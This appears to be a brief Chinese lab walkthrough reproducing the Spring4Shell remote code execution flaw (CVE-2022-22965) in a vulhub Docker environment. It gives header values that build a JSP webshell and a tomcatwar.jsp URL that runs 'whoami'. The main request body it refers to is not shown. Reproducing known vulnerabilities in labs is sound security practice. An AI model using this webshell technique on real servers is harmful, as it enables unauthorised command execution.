Spring Framework远程代码执行漏洞(CVE-2022-22965)复现

漏洞复现

环境搭建

使用vulhub的docker环境

git clone https://github.com/vulhub/vulhub.git
cd vulhub/spring/CVE-2022-22965
docker-compose up -d

访问http:127.0.0.1:8080

构造请求地址

红色部分替换为

suffix: %>//
c1: Runtime
c2: <%
DNT: 1

访问

http://127.0.0.1:8080/tomcatwar.jsp?pwd=j&cmd=whoami

即可执行命令

Logo

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐